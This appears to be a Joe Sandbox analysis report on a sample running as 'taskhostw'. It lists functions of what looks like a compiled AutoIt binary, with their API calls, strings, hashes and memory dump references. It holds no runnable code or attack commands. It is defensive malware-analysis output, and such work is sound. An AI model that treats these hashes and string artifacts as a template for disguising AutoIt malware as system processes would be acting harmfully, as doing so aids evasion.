Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 87f369861797b1bc0ead105e3ec6aa56ed2b1c82ded10d099c23324b5e322e96
Instruction ID: 2588d4c81bf45669a009949ad2fb3b40eb7482bfe00c41d1d506739b1f22bec6
Opcode Fuzzy Hash: 87f369861797b1bc0ead105e3ec6aa56ed2b1c82ded10d099c23324b5e322e96
Instruction Fuzzy Hash: 3BC15BB1D10219AACF21DF95CC85EDEBBBDEF64310F0040AAF609E7241DB709A948F61

Function 001B71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001B4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002752F8,?,001B37C0,?), ref: 001B4882

Part of subcall function 001D068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,001B72C5), ref: 001D06AD

RegOpenKeyExW.KERNEL32 ref: 001B7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001EEC21
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 001EEC62
RegCloseKey.ADVAPI32(?), ref: 001EECA0
_wcscat.LIBCMT ref: 001EECF9

Strings

Software\AutoIt v3\AutoIt, xrefs: 001B72FE
\Include\, xrefs: 001B72C5
\, xrefs: 001EED1C
Include, xrefs: 001EEC18, 001EEC59

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: be110d389cf11f84a14f5a5bb286bf0528f5564b041a059d0e01d27259d9c230
Instruction ID: 2ae00f0b0d24fe8da126f7c208073eabf0523be4740b3a45b3e33441ae44b269
Opcode Fuzzy Hash: be110d389cf11f84a14f5a5bb286bf0528f5564b041a059d0e01d27259d9c230
Instruction Fuzzy Hash: 647181715097019EC744EF65EC8999FBBE8FFA9340F40492EF849932B1DB319988CB51

Function 001B3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 001B36D2
KillTimer.USER32 ref: 001B36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001B371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001B372A
CreatePopupMenu.USER32 ref: 001B373E
PostQuitMessage.USER32(00000000), ref: 001B375F

Strings

%$, xrefs: 001ED201, 001ED24F
TaskbarCreated, xrefs: 001B3725

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%$
API String ID: 129472671-1950341607
Opcode ID: 7195db64bb130fb49c943a45ff994bbd1bb0af26ac5796ecc30a7f5d3749d7fd
Instruction ID: 8701c47b17c71baa4fb0653eb61c3df3e124589ec0fedad325e7a72849f4b5d8
Opcode Fuzzy Hash: 7195db64bb130fb49c943a45ff994bbd1bb0af26ac5796ecc30a7f5d3749d7fd
Instruction Fuzzy Hash: 474137B1610955BBDB186F78FD0DBF97755EB10300F140125FA26C62A2CFB49EB09762

Function 001B3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 001B3A62
LoadCursorW.USER32 ref: 001B3A71
LoadIconW.USER32 ref: 001B3A88
LoadIconW.USER32 ref: 001B3A9A
LoadIconW.USER32 ref: 001B3AAC
LoadImageW.USER32 ref: 001B3AD2
RegisterClassExW.USER32(?), ref: 001B3B28

Part of subcall function 001B3041: GetSysColorBrush.USER32 ref: 001B3074
Part of subcall function 001B3041: RegisterClassExW.USER32(00000030), ref: 001B309E
Part of subcall function 001B3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001B30AF
Part of subcall function 001B3041: InitCommonControlsEx.COMCTL32(?), ref: 001B30CC
Part of subcall function 001B3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001B30DC
Part of subcall function 001B3041: LoadIconW.USER32 ref: 001B30F2
Part of subcall function 001B3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001B3101

Strings

0, xrefs: 001B3B06
#, xrefs: 001B3B0D
AutoIt v3, xrefs: 001B3B17

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e970afe620cd2b8925d3bb37cc266315a045429e01c02c4d8f26f45fb84b5502
Instruction ID: 627c27be04a3b9ab81c9bb2172746c9f27be9e16f45db4a881ff47430f3ee5bf
Opcode Fuzzy Hash: e970afe620cd2b8925d3bb37cc266315a045429e01c02c4d8f26f45fb84b5502
Instruction Fuzzy Hash: 10214870D11319AFEB10DFA4FD0DB9DBBB5FB08711F10052AFA08A62A2D7B556908F94

Function 001B3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 001B37C0
/ErrorStdOut, xrefs: 001B388F
/AutoIt3ExecuteScript, xrefs: 001B38CE
CMDLINERAW, xrefs: 001B380D
/AutoIt3OutputDebug, xrefs: 001B38A4
R', xrefs: 001ED37E
/AutoIt3ExecuteLine, xrefs: 001B38B9
CMDLINE, xrefs: 001B3834

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R'
API String ID: 1825951767-819366631
Opcode ID: 5de01121e77276daeec31f081b6b6a078e567d1e6b5e249ca51494c5879879e0
Instruction ID: 89dc41ffa3c5fe1cb6f7bcd4ec90a5bf4e247797eaf0a8cf3460a91bcc93108d
Opcode Fuzzy Hash: 5de01121e77276daeec31f081b6b6a078e567d1e6b5e249ca51494c5879879e0
Instruction Fuzzy Hash: 8BA16F71C102299ADF14EFA4DC96EEEB778BF25300F44052AF426B7192DF749A09CB61

Function 001BF8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D02E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D0313
Part of subcall function 001D02E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001D031B
Part of subcall function 001D02E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D0326
Part of subcall function 001D02E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D0331
Part of subcall function 001D02E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001D0339
Part of subcall function 001D02E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 001D0341

Part of subcall function 001C6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001BFA90), ref: 001C62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001BFB2D
OleInitialize.OLE32(00000000), ref: 001BFBAA
CloseHandle.KERNEL32(00000000), ref: 001F4921

Strings

<W', xrefs: 001BFA90
\T', xrefs: 001BF957
%$, xrefs: 001BF8F6, 001BF908, 001BFACE, 001BFBB1
S', xrefs: 001BF94B

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <W'$\T'$%$$S'
API String ID: 1986988660-3842253252
Opcode ID: 092264d49e735357e0b77d9a89c781923d5fa9215dde215622b1c573a912be6e
Instruction ID: 29d2263303af341dca5cb2a93f7b225532bd262778438d3904a7c0caddc5645b
Opcode Fuzzy Hash: 092264d49e735357e0b77d9a89c781923d5fa9215dde215622b1c573a912be6e
Instruction Fuzzy Hash: 0281C8B0811A608ED398DF39B96D659FBE5FB983067A0856AE00DCB271EBF044C5CF10

Function 001B39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 001B3A15
CreateWindowExW.USER32 ref: 001B3A36
ShowWindow.USER32(00000000), ref: 001B3A4A
ShowWindow.USER32(00000000), ref: 001B3A53

Strings

edit, xrefs: 001B3A30
AutoIt v3, xrefs: 001B3A0D, 001B3A12, 001B3A13

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 8f59917c9f865f63b65aad78e07ef4ee9d0bd6af133f2dc464c9dd74d1fed5c4
Instruction ID: a5769360889b3771052f7a571f4a9fd075d9a8539340ca40ce7381f0830cfbbb
Opcode Fuzzy Hash: 8f59917c9f865f63b65aad78e07ef4ee9d0bd6af133f2dc464c9dd74d1fed5c4
Instruction Fuzzy Hash: E5F03A709002A07EFA3057237C0DE2BAE7DD7C6F50F00002ABE08A2271C6A10891DAB4

Function 001B410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001ED51C

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

_memset.LIBCMT ref: 001B418D
_wcscpy.LIBCMT ref: 001B41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001B41F1

Strings

Line: , xrefs: 001ED545

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: fb02717b38d068383acec6d6266c4f33af6d9a7e03a6a385875b74b6d24feffb
Instruction ID: 6477b1401cad066425a7daab8065fba7ad1d2600aac63aed54dab28d6568ab32
Opcode Fuzzy Hash: fb02717b38d068383acec6d6266c4f33af6d9a7e03a6a385875b74b6d24feffb
Instruction Fuzzy Hash: 0A31D5714083156FD321EB64EC46BDBB7ECAF64300F10851EF599921D2EB70A688CB92

Function 001D558D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 001D55EB
_memcpy_s.LIBCMT ref: 001D565D
__read_nolock.LIBCMT ref: 001D56BB
__filbuf.LIBCMT ref: 001D56DE
_memset.LIBCMT ref: 001D5722

Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction ID: 6d98379152fd86616d5d2ba9cc52cc655d8e21b6006ff26f5c7a4ed07cbb1279
Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction Fuzzy Hash: EA51AD30A00B05DBDB299FA9D8846AEB7B7AF50320F64872BF835963D1D770DD508B40

Function 001B69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001B4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4F6F

_free.LIBCMT ref: 001EE5BC
_free.LIBCMT ref: 001EE603

Part of subcall function 001B6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001B6D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 001EE392
Bad directive syntax error, xrefs: 001EE5EB

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: f03399a0841719a8c434302e33d7b5391646d7ecb8c8548dc232ec7fbaa52653
Instruction ID: 79501617fc9820fa2c70e67011dcf19b9ee3d0ecf466df0b5f27b75f8a1d30d0
Opcode Fuzzy Hash: f03399a0841719a8c434302e33d7b5391646d7ecb8c8548dc232ec7fbaa52653
Instruction Fuzzy Hash: 3C919D71910659AFCF14EFA5C8919EDB7F4FF28314F10442AF816AB2A1EB30A954CF60

Function 001B35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 001B35D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 001B35F5
RegCloseKey.ADVAPI32(00000000), ref: 001B3617

Strings

Control Panel\Mouse, xrefs: 001B35D2

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 49fb735da23df457b3cb0c40d56088b57b4c0b261274910861f8a17b2a0434dc
Instruction ID: aac69688d8531bfdc27b3e6a18438cdf47e4aaea06c38d40a2f5cf46af498427
Opcode Fuzzy Hash: 49fb735da23df457b3cb0c40d56088b57b4c0b261274910861f8a17b2a0434dc
Instruction Fuzzy Hash: E71148B5910208BFDB208F68EC84AEEB7B8EF04740F015469E805D7210D3719F609760

Function 00219604 Relevance: 6.2, APIs: 4, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001B5045: _fseek.LIBCMT ref: 001B505D

Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198CD
Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198E0

_free.LIBCMT ref: 0021974B
_free.LIBCMT ref: 00219752
_free.LIBCMT ref: 002197BD

Part of subcall function 001D2ED5: HeapFree.KERNEL32(00000000,00000000), ref: 001D2EE9
Part of subcall function 001D2ED5: GetLastError.KERNEL32(00000000,?,001D9BA4), ref: 001D2EFB

_free.LIBCMT ref: 002197C5

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 1bb30ac2c2529d38b76e3259ee4a4105e0745002609c4fde95a0a965d26180c8
Instruction ID: 098e165c58fac9e3567b26172ff645d2b892f138dead08109863b20884ddab0d
Opcode Fuzzy Hash: 1bb30ac2c2529d38b76e3259ee4a4105e0745002609c4fde95a0a965d26180c8
Instruction Fuzzy Hash: A1514EB1914258AFDF249F64DC81ADEBBBAEF58300F10049EF609A7381DB715A90CF58

Function 001D487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001D4910
__flush.LIBCMT ref: 001D4930
__write.LIBCMT ref: 001D4963
__flsbuf.LIBCMT ref: 001D4991

Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
Instruction ID: cdee2a324aea04eddf91a475f8e2655c03d7a5e5c280422d31d2132d31dfd5a5
Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
Instruction Fuzzy Hash: F441D531A047459BDF1C8FAAC8A19AF7BA5AF483A4B24853FE85587740D770DD409B44

Function 001B4DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001B4E1A

Strings

EA06, xrefs: 001EDC25
AU3!P/$, xrefs: 001B4E14

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/$$EA06
API String ID: 4104443479-3329588104
Opcode ID: fe11031e93b4c3081d6dd26b7431776d758bda515716710182230658e6b28b4c
Instruction ID: 04b0d2feb406c5a8d92736833fe256390c54e0a836322bd9917d5878c57268d1
Opcode Fuzzy Hash: fe11031e93b4c3081d6dd26b7431776d758bda515716710182230658e6b28b4c
Instruction Fuzzy Hash: F7415921A045586BDF259B64C8A1BFE7FB6AB15300F69C069F8829B283C739DD4487E1

Function 001B73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001EED92
GetOpenFileNameW.COMDLG32(?), ref: 001EEDDC

Part of subcall function 001B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B48A1,?,?,001B37C0,?), ref: 001B48CE

Part of subcall function 001D0911: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,001B741D,00000001,00276290,?,001B3BCD,002752F8,002752E0,?,?), ref: 001D0930

Strings

X, xrefs: 001EEDAA

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 68a08d54a01efac90a1ea2ab2c4a00ebc98dce3711278edbc0b83695919b3dd8
Instruction ID: e140ae22d89ede5995502c668accae2f350fa3ea179a43ec64a49a05efaf78e8
Opcode Fuzzy Hash: 68a08d54a01efac90a1ea2ab2c4a00ebc98dce3711278edbc0b83695919b3dd8
Instruction Fuzzy Hash: 6421C330A10698ABCB05DFD4CC45BEE7BF9AF58304F00405AE808A7282DBF459898BA1

Function 00218E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00218E55
__fread_nolock.LIBCMT ref: 00218E6A

Strings

EA06, xrefs: 00218E9C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: ca3c734e55d92fc8ba54844eac3b9b9130bae951de2461ae49ecd43f1ddede4a
Instruction ID: 03ba7e12d2739013ae87f78b5a0fee8b5f8ba3bbe0b740852af2d1dfef2210a4
Opcode Fuzzy Hash: ca3c734e55d92fc8ba54844eac3b9b9130bae951de2461ae49ecd43f1ddede4a
Instruction Fuzzy Hash: 43012D71C142587EDB28CBA8CC56EFE7BF8DB15301F00459FF552D2281E9B4E6148760

Function 0021998C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

